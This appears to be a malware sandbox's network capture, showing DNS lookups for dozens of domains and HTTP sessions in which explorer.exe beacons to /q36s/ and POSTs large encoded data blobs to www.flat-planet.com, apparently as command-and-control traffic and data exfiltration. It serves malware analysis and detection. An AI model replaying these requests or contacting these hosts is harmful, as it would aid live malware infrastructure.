Feb 9, 2022 13:08:53.839023113 CET	192.168.2.3	8.8.8.8	0x5e50	Standard query (0)	www.flat-planet.com	A (IP address)	IN (0x0001)
Feb 9, 2022 13:08:59.107790947 CET	192.168.2.3	8.8.8.8	0x8043	Standard query (0)	www.drinco.club	A (IP address)	IN (0x0001)
Feb 9, 2022 13:08:59.134149075 CET	192.168.2.3	8.8.8.8	0xf071	Standard query (0)	www.drinco.club	A (IP address)	IN (0x0001)
Feb 9, 2022 13:08:59.161711931 CET	192.168.2.3	8.8.8.8	0xbf82	Standard query (0)	www.drinco.club	A (IP address)	IN (0x0001)
Feb 9, 2022 13:09:04.200251102 CET	192.168.2.3	8.8.8.8	0xf57f	Standard query (0)	www.libertymarket.net	A (IP address)	IN (0x0001)
Feb 9, 2022 13:09:04.463673115 CET	192.168.2.3	8.8.8.8	0x60a9	Standard query (0)	www.libertymarket.net	A (IP address)	IN (0x0001)
Feb 9, 2022 13:09:04.735899925 CET	192.168.2.3	8.8.8.8	0xd3ae	Standard query (0)	www.libertymarket.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 9, 2022 13:06:28.639404058 CET	8.8.8.8	192.168.2.3	0x4a8f	Name error (3)	www.strickercosolutions.com	none	none	A (IP address)	IN (0x0001)
Feb 9, 2022 13:06:33.991206884 CET	8.8.8.8	192.168.2.3	0x1e78	No error (0)	www.fhpuyfpe.com	fyjc-ytnyvkqi.com.txwlcdn13.com		CNAME (Canonical name)	IN (0x0001)
Feb 9, 2022 13:06:33.991206884 CET	8.8.8.8	192.168.2.3	0x1e78	No error (0)	fyjc-ytnyvkqi.com.txwlcdn13.com	ifsay8jx7m.bigbackbone.com		CNAME (Canonical name)	IN (0x0001)
Feb 9, 2022 13:06:33.991206884 CET	8.8.8.8	192.168.2.3	0x1e78	No error (0)	ifsay8jx7m.bigbackbone.com	ifsay8jx7m.hellomyai.com		CNAME (Canonical name)	IN (0x0001)
Feb 9, 2022 13:06:33.991206884 CET	8.8.8.8	192.168.2.3	0x1e78	No error (0)	ifsay8jx7m.hellomyai.com		134.122.133.172	A (IP address)	IN (0x0001)
Feb 9, 2022 13:06:39.989192963 CET	8.8.8.8	192.168.2.3	0xb0c0	No error (0)	www.unitedtrials.net		74.208.236.190	A (IP address)	IN (0x0001)
Feb 9, 2022 13:06:45.657224894 CET	8.8.8.8	192.168.2.3	0xaed1	Name error (3)	www.tutorgpa.com	none	none	A (IP address)	IN (0x0001)
Feb 9, 2022 13:06:50.689320087 CET	8.8.8.8	192.168.2.3	0xb61f	Name error (3)	www.real-market-34.xyz	none	none	A (IP address)	IN (0x0001)
Feb 9, 2022 13:06:56.740200996 CET	8.8.8.8	192.168.2.3	0x7cf9	No error (0)	www.oooci.com		101.35.123.80	A (IP address)	IN (0x0001)
Feb 9, 2022 13:06:56.742850065 CET	8.8.8.8	192.168.2.3	0x7cf9	No error (0)	www.oooci.com		101.35.123.80	A (IP address)	IN (0x0001)
Feb 9, 2022 13:07:07.314388990 CET	8.8.8.8	192.168.2.3	0xf5ac	Name error (3)	www.punksparrow.com	none	none	A (IP address)	IN (0x0001)
Feb 9, 2022 13:07:12.343287945 CET	8.8.8.8	192.168.2.3	0xfd21	Name error (3)	www.drinco.club	none	none	A (IP address)	IN (0x0001)
Feb 9, 2022 13:07:17.614554882 CET	8.8.8.8	192.168.2.3	0xc5a9	Name error (3)	www.libertymarket.net	none	none	A (IP address)	IN (0x0001)
Feb 9, 2022 13:07:22.760621071 CET	8.8.8.8	192.168.2.3	0x3439	No error (0)	www.perfectselfstorageaston.com		66.96.160.139	A (IP address)	IN (0x0001)
Feb 9, 2022 13:07:28.055629015 CET	8.8.8.8	192.168.2.3	0xe3d9	No error (0)	www.computershit.net		104.21.36.34	A (IP address)	IN (0x0001)
Feb 9, 2022 13:07:28.055629015 CET	8.8.8.8	192.168.2.3	0xe3d9	No error (0)	www.computershit.net		172.67.184.89	A (IP address)	IN (0x0001)
Feb 9, 2022 13:07:33.161246061 CET	8.8.8.8	192.168.2.3	0x1038	Name error (3)	www.us-paypal.online	none	none	A (IP address)	IN (0x0001)
Feb 9, 2022 13:07:38.244827986 CET	8.8.8.8	192.168.2.3	0x62f3	Name error (3)	www.boninvahas.club	none	none	A (IP address)	IN (0x0001)
Feb 9, 2022 13:07:43.290422916 CET	8.8.8.8	192.168.2.3	0xe748	No error (0)	www.getbraintruth.com		18.194.171.90	A (IP address)	IN (0x0001)
Feb 9, 2022 13:07:49.069250107 CET	8.8.8.8	192.168.2.3	0x7763	No error (0)	www.cosmosmeta.com		52.20.84.62	A (IP address)	IN (0x0001)
Feb 9, 2022 13:08:03.208623886 CET	8.8.8.8	192.168.2.3	0xf5e3	No error (0)	www.yokoi-tatami-lab.com	yokoi-tatami-lab.com		CNAME (Canonical name)	IN (0x0001)
Feb 9, 2022 13:08:03.208623886 CET	8.8.8.8	192.168.2.3	0xf5e3	No error (0)	yokoi-tatami-lab.com		106.186.69.5	A (IP address)	IN (0x0001)
Feb 9, 2022 13:08:08.865133047 CET	8.8.8.8	192.168.2.3	0x54eb	Name error (3)	www.wxiw.xyz	none	none	A (IP address)	IN (0x0001)
Feb 9, 2022 13:08:13.952061892 CET	8.8.8.8	192.168.2.3	0xd32b	No error (0)	www.okargo.pro		213.186.33.5	A (IP address)	IN (0x0001)
Feb 9, 2022 13:08:19.074094057 CET	8.8.8.8	192.168.2.3	0xc1e5	No error (0)	www.gestaltants.com	gestaltants.com		CNAME (Canonical name)	IN (0x0001)
Feb 9, 2022 13:08:19.074094057 CET	8.8.8.8	192.168.2.3	0xc1e5	No error (0)	gestaltants.com		34.102.136.180	A (IP address)	IN (0x0001)
Feb 9, 2022 13:08:24.245446920 CET	8.8.8.8	192.168.2.3	0x9080	No error (0)	www.marketplaceimmo.com		217.160.0.132	A (IP address)	IN (0x0001)
Feb 9, 2022 13:08:29.344249010 CET	8.8.8.8	192.168.2.3	0x40a3	Name error (3)	www.marsmoose.com	none	none	A (IP address)	IN (0x0001)
Feb 9, 2022 13:08:34.415016890 CET	8.8.8.8	192.168.2.3	0x63d3	No error (0)	www.fraiuhs.com		162.0.233.84	A (IP address)	IN (0x0001)
Feb 9, 2022 13:08:53.918651104 CET	8.8.8.8	192.168.2.3	0x5e50	No error (0)	www.flat-planet.com		185.215.4.12	A (IP address)	IN (0x0001)
Feb 9, 2022 13:08:59.128581047 CET	8.8.8.8	192.168.2.3	0x8043	Name error (3)	www.drinco.club	none	none	A (IP address)	IN (0x0001)
Feb 9, 2022 13:08:59.155647039 CET	8.8.8.8	192.168.2.3	0xf071	Name error (3)	www.drinco.club	none	none	A (IP address)	IN (0x0001)
Feb 9, 2022 13:08:59.180470943 CET	8.8.8.8	192.168.2.3	0xbf82	Name error (3)	www.drinco.club	none	none	A (IP address)	IN (0x0001)
Feb 9, 2022 13:09:04.460299015 CET	8.8.8.8	192.168.2.3	0xf57f	Name error (3)	www.libertymarket.net	none	none	A (IP address)	IN (0x0001)
Feb 9, 2022 13:09:04.718585968 CET	8.8.8.8	192.168.2.3	0x60a9	Name error (3)	www.libertymarket.net	none	none	A (IP address)	IN (0x0001)
Feb 9, 2022 13:09:04.754617929 CET	8.8.8.8	192.168.2.3	0xd3ae	Name error (3)	www.libertymarket.net	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.fhpuyfpe.com

www.unitedtrials.net

www.oooci.com

www.perfectselfstorageaston.com

www.computershit.net

www.getbraintruth.com

www.cosmosmeta.com

www.yokoi-tatami-lab.com

www.okargo.pro

www.gestaltants.com

www.marketplaceimmo.com

www.fraiuhs.com

www.flat-planet.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49798	134.122.133.172	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2022 13:06:34.607599020 CET	10438	OUT	GET /q36s/?1bGpqN=qjehMM29YnjvQ+IsXXvHiKjxodx29m58RRND8kRaJ9rSQmiI4bNYuG3T9nEMHR/0ZqgQ&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1 Host: www.fhpuyfpe.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 9, 2022 13:06:34.947403908 CET	10439	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 09 Feb 2022 12:06:34 GMT Content-Type: text/html Content-Length: 163 Connection: close Location: https://www.fhpuyfpe.com/q36s/?1bGpqN=qjehMM29YnjvQ+IsXXvHiKjxodx29m58RRND8kRaJ9rSQmiI4bNYuG3T9nEMHR/0ZqgQ&wFNT8=0jNDXxTXR8rtijfp Server: Tengine Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 47 6f 6f 67 6c 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>Google</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49800	74.208.236.190	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2022 13:06:40.136617899 CET	10445	OUT	GET /q36s/?1bGpqN=tC61wDElLuFqXOy7bNjE3R/KY1KZZj+Oe9iJyNVpeVf3JMOvufdGkYhMQuQyKkTwQ1EL&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1 Host: www.unitedtrials.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 9, 2022 13:06:40.286726952 CET	10445	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 626 Connection: close Date: Wed, 09 Feb 2022 12:06:40 GMT Server: Apache Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49833	217.160.0.132	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2022 13:08:24.265538931 CET	10526	OUT	GET /q36s/?1bGpqN=3pP/L2XpSC30J9vFVSLRbULXiIxRhzb0AzWKRXEle5xB/rg0XzMhonS5eIq4WPaEzNk7&Vr=MBZl9ZMXj4u HTTP/1.1 Host: www.marketplaceimmo.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 9, 2022 13:08:24.293019056 CET	10527	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 837 Connection: close Date: Wed, 09 Feb 2022 12:08:24 GMT Server: Apache Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 4c 65 20 66 69 63 68 69 65 72 20 72 65 71 75 69 73 20 6e 27 61 20 70 61 73 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 74 72 6f 75 76 26 65 61 63 75 74 65 3b 2e 0a 49 6c 20 70 65 75 74 20 73 27 61 67 69 72 20 64 27 75 6e 65 20 65 72 72 65 75 72 20 74 65 63 68 6e 69 71 75 65 2e 20 56 65 75 69 6c 6c 65 7a 20 72 26 65 61 63 75 74 65 3b 65 73 73 61 79 65 72 20 75 6c 74 26 65 61 63 75 74 65 3b 72 69 65 75 72 65 6d 65 6e 74 2e 20 53 69 20 76 6f 75 73 20 6e 65 20 70 6f 75 76 65 7a 20 70 61 73 20 61 63 63 26 65 61 63 75 74 65 3b 64 65 72 20 61 75 20 66 69 63 68 69 65 72 20 61 70 72 26 65 67 72 61 76 65 3b 73 20 70 6c 75 73 69 65 75 72 73 20 74 65 6e 74 61 74 69 76 65 73 2c 20 63 65 6c 61 20 73 69 67 6e 69 66 69 65 20 71 75 27 69 6c 20 61 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 73 75 70 70 72 69 6d 26 65 61 63 75 74 65 3b 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Le fichier requis n'a pas été trouvé.Il peut s'agir d'une erreur technique. Veuillez réessayer ultérieurement. Si vous ne pouvez pas accéder au fichier après plusieurs tentatives, cela signifie qu'il a été supprimé. </p> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.3	49834	162.0.233.84	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2022 13:08:34.576699018 CET	10528	OUT	GET /q36s/?1bGpqN=KaI0Rj3wcsIqg8Lge9r70qxIl2ZARFR6pw9QZ8eIk4lgB884W2uHm2Neex91t0JOAHKn&wFNT8=0jNDXxTXR8rtijfp HTTP/1.1 Host: www.fraiuhs.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 9, 2022 13:08:34.861932039 CET	10529	IN	HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2022 12:08:34 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 277 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 66 72 61 69 75 68 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.fraiuhs.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.3	49835	185.215.4.12	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2022 13:08:53.957725048 CET	10531	OUT	POST /q36s/ HTTP/1.1 Host: www.flat-planet.com Connection: close Content-Length: 412 Cache-Control: no-cache Origin: http://www.flat-planet.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.flat-planet.com/q36s/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 31 62 47 70 71 4e 3d 66 62 62 71 63 4f 5a 6d 55 4f 42 49 30 30 54 45 76 5a 6e 79 30 32 34 46 56 6c 43 64 58 58 55 4b 5a 31 72 4d 34 31 78 71 68 4d 53 59 7e 6a 57 44 38 45 76 39 64 6f 59 62 4b 30 41 51 37 5f 72 4b 59 35 34 30 46 48 46 4f 54 78 68 79 35 61 78 30 28 41 37 56 6c 38 51 5a 55 69 4f 65 46 6a 45 4b 61 48 57 62 7a 61 36 33 7e 5f 63 73 33 4c 4e 6a 5a 57 50 50 5a 6f 59 38 57 58 36 51 77 61 54 52 4d 38 43 71 4a 78 61 47 64 4c 78 39 33 67 59 49 76 50 7a 30 71 56 30 64 53 6a 66 58 48 4a 34 48 63 76 47 62 53 52 70 71 7a 6d 5a 31 7e 49 4e 5f 76 6a 6b 50 36 54 66 48 71 33 48 70 67 51 64 36 34 6f 6d 33 71 43 6d 56 4e 5f 72 37 66 39 33 42 46 65 4e 59 36 4f 53 48 72 42 7e 59 41 6b 35 5f 34 43 62 2d 62 70 77 72 33 48 4c 68 59 69 4a 59 5a 6d 48 66 65 55 4f 2d 48 58 6f 65 37 44 65 36 34 38 45 6e 43 76 5a 6f 46 47 62 47 72 45 63 68 56 44 64 4a 79 6d 74 4f 62 54 42 6c 32 33 36 55 6f 56 69 32 38 41 57 75 69 4b 54 33 69 6e 46 51 79 51 4f 67 44 32 67 68 48 72 55 34 46 68 44 42 69 61 4b 62 57 70 63 6b 41 44 76 5f 6c 61 46 4b 55 31 52 70 53 5a 61 7a 63 67 67 36 28 5f 56 4c 54 57 4d 69 6f 4f 4f 41 47 5a 62 44 76 4d 4f 4c 4c 6f 78 38 4f 38 58 4a 35 65 59 55 45 4e 6f 52 56 54 58 78 71 49 74 33 62 57 36 35 30 77 67 70 6c 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 1bGpqN=fbbqcOZmUOBI00TEvZny024FVlCdXXUKZ1rM41xqhMSY~jWD8Ev9doYbK0AQ7_rKY540FHFOTxhy5ax0(A7Vl8QZUiOeFjEKaHWbza63~_cs3LNjZWPPZoY8WX6QwaTRM8CqJxaGdLx93gYIvPz0qV0dSjfXHJ4HcvGbSRpqzmZ1~IN_vjkP6TfHq3HpgQd64om3qCmVN_r7f93BFeNY6OSHrB~YAk5_4Cb-bpwr3HLhYiJYZmHfeUO-HXoe7De648EnCvZoFGbGrEchVDdJymtObTBl236UoVi28AWuiKT3inFQyQOgD2ghHrU4FhDBiaKbWpckADv_laFKU1RpSZazcgg6(_VLTWMioOOAGZbDvMOLLox8O8XJ5eYUENoRVTXxqIt3bW650wgplg).
Feb 9, 2022 13:08:54.020278931 CET	10569	IN	HTTP/1.1 301 Moved Permanently Server: ddos-guard Connection: close Set-Cookie: __ddg1=jESgB9qmgl8kBUxsJWU9; Domain=.flat-planet.com; HttpOnly; Path=/; Expires=Thu, 09-Feb-2023 12:08:53 GMT Date: Wed, 09 Feb 2022 12:08:53 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 241 Location: https://www.flat-planet.com/q36s/ X-Host: www.flat-planet.com cache-control: max-age=0 cache-control: public Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6c 61 74 2d 70 6c 61 6e 65 74 2e 63 6f 6d 2f 71 33 36 73 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.flat-planet.com/q36s/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.3	49836	185.215.4.12	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2022 13:08:53.990935087 CET	10544	OUT	POST /q36s/ HTTP/1.1 Host: www.flat-planet.com Connection: close Content-Length: 36480 Cache-Control: no-cache Origin: http://www.flat-planet.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.flat-planet.com/q36s/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 31 62 47 70 71 4e 3d 66 62 62 71 63 50 6c 4b 51 39 46 56 78 6b 58 76 68 4b 58 6d 37 6e 49 44 54 45 32 43 53 54 45 56 4f 55 36 33 31 55 41 61 67 49 36 43 35 51 79 71 32 6e 65 36 64 6f 70 5f 41 6e 6b 55 6f 76 6e 4e 59 35 52 2d 46 48 52 4f 53 77 35 69 35 39 56 53 7e 69 44 57 69 63 51 31 56 69 4f 39 4f 43 6f 6e 61 48 54 32 7a 61 79 6e 7e 76 49 73 74 70 46 6a 62 56 6e 36 58 6f 59 2d 62 33 71 4d 74 4b 57 7a 4d 34 6d 79 4a 77 6d 47 64 36 4e 39 32 44 77 48 74 4f 7a 33 6a 6c 31 32 58 6a 66 38 4d 70 6b 54 63 76 4b 35 53 54 39 71 7a 55 4e 31 28 59 74 5f 70 55 49 4d 79 44 66 47 75 33 48 6b 71 77 68 52 34 73 47 42 71 44 53 5f 59 62 28 37 65 4e 33 41 42 4a 70 32 73 4e 36 75 6e 6b 71 46 41 6b 45 62 35 54 32 74 62 70 63 4c 77 77 7a 77 47 55 63 50 5a 6b 4b 77 66 30 50 31 49 33 70 41 37 44 65 4b 34 38 46 47 43 75 70 6f 46 46 72 47 35 52 59 68 52 6e 70 4b 73 57 74 50 56 7a 42 39 79 33 6e 6e 6f 56 61 41 38 42 79 45 69 38 7a 33 67 43 35 51 69 52 4f 76 4c 57 67 37 4e 4c 56 73 50 42 44 4f 69 61 4c 4f 57 6f 63 30 41 79 7a 5f 6c 4a 64 4b 5a 33 70 70 56 35 61 7a 51 41 67 38 71 50 51 54 54 56 38 6d 6f 50 7e 32 47 4f 44 44 76 66 47 4c 4b 4e 64 38 4a 4d 58 4a 67 4f 5a 36 49 4e 4e 61 51 52 58 47 76 4b 6c 53 53 6a 37 70 33 44 5a 6b 6d 43 75 69 4b 2d 38 4e 43 56 7e 6f 46 7a 63 2d 56 49 6c 4f 66 7a 50 44 74 4d 35 6c 66 70 30 4b 48 2d 64 33 50 75 66 6a 30 42 46 44 54 54 36 4e 56 48 31 44 53 50 4a 54 46 67 74 5a 4b 56 6c 63 43 53 38 39 7a 6f 6e 39 58 72 65 6d 71 66 61 70 67 34 38 61 63 4f 39 36 50 56 53 6b 66 43 6a 45 6f 57 4e 34 64 72 77 71 66 51 6a 76 68 69 